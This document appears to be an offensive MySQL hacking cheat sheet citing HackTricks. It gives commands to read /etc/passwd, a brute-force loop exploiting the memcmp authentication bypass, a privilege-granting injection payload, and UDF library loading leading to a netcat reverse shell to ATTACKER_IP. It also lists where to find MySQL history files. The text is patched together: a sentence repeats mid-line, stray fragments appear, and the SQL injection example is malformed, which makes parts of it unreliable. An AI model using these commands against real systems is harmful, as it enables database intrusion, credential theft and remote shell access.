If file reading is blocked via LOAD DATA LOCAL INFILE, try:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE temp_table FIELDS TERMINATED BY '\n';
Requires LOCAL keyword and a temp table.
Affected versions: MySQL 5.0.x – 5.1.63, 5.5.x – 5.5.24, 5.6.x – 5.6.6
Exploit: When memcmp() returns 0, authentication succeeds even with wrong password.
Exploit script (bash):
for i in `seq 1 1000`; do mysql -u root -pwrong -h target.com -e "select 1" 2>&1; done
~1 in 256 chance of success.
You have the DB. Now extract the crown jewels.
When INTO OUTFILE is blocked, HackTricks guides professionals toward UDF exploitation. This is an advanced technique that involves loading a custom binary library into MySQL to execute system commands.
Example:
http://example.com/vulnerable-page?id=1 UNION SELECT GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' -- -
1. Compile shared library (lib_mysqludf_sys.so)
Download from MySQL UDF Exploit or Metasploit:
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so
2. Write binary to plugin dir (hex encoded to bypass restrictions):
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';
(Full hex dump omitted for brevity – generate with xxd -p udf.so | tr -d '\n') mysql hacktricks verified
3. Create UDF functions:
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
CREATE FUNCTION sys_exec RETURNS INT SONAME 'udf.so';
CREATE FUNCTION sys_open RETURNS INT SONAME 'udf.so';
4. Execute OS commands:
SELECT sys_eval('id');
SELECT sys_exec('nc -e /bin/bash ATTACKER_IP 4444');
Windows equivalent: udf.dll → sys_exec('whoami'). If file reading is blocked via LOAD DATA
cat ~/.mysql_history
/home/user/.mysql_history
/root/.mysql_history